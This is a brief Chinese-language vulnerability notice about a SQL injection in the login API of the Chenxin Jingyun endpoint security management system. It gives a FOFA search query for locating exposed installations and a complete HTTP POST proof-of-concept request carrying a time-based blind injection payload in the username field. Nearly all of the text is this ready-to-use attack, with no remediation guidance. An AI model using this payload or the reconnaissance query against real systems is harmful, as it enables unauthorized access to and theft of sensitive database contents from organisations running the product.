漏洞描述
辰信领创 辰信景云终端安全管理系统 login存在 SQL注入漏洞,攻击者通过漏洞可以获取数据库敏感信息
漏洞复现
fofa语法:"辰信景云终端安全管理系统" && icon_hash="-429260979"
登录页面如下:
POC:
POST /api/user/login HTTP/2
Host: zy.x1be.com
Content-Length: 102
Sec-Ch-Ua: "Chromium";v="109", "Not_A Brand";v="99"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
captcha=&password=21232f297a57a5a743894a0e4a801fc3&username=admin'and(select*from(select+sleep(5))a)='
